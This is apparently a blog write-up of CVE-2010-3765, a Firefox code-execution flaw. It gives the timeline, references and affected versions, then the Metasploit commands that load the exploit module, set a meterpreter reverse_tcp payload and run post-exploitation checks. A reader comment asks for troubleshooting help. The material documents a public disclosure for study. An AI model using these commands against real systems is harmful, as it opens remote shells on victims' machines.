CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit

Timeline :

Vulnerability discovered in the wild
Vulnerability corrected by vendor the 2010-10-27
Vulnerability & Exploit-DB PoC disclosed by unknown the 2010-10-29
Metasploit PoC released the 2011-02-17

PoC provided by :

unknown
scriptjunkie

Reference(s) :

CVE-2010-3765
MFSA 2010-73
EDB-ID-15352
OSVDB-ID-68905

Affected version(s) :

All Firefox 3.6.x versions previous version 3.6.12
All Firefox 3.5.x versions previous version 3.5.15
All Thunderbird 3.1.x versions previous version 3.1.6
All Thunderbird 3.0.x versions previous version 3.0.10
All SeaMonkey 2.0.x versions previous version 2.0.10

Tested on Windows XP SP3 with :

Firefox 3.6.9 released the 2010-09-23

Description :

This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a metasploit port of the in-the-wild exploit.

Commands :

use exploit/windows/browser/mozilla_interleaved_write
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

2 Replies to “CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit”

  1. Hi!
    I am also a little interested in research of this vulnerability.
    I have downloaded mozilla_interleaved_write.rb, and have placed it in a folder of modules. Then has done the same actions, only with FF 3.6.11 under VB WinXP SP2. But in the console after “Sending exploit to…” nothing is happens. On the target system for a long time firefox runs a script until it finishes the size of virtual memory, and then nothing happens.
    I tried to run different payloads (eg, windows/exec CMD = calc.exe), but the result is the same.
    Can you suggest what am I doing wrong?
    Maybe you change the file of exploit?

Comments are closed.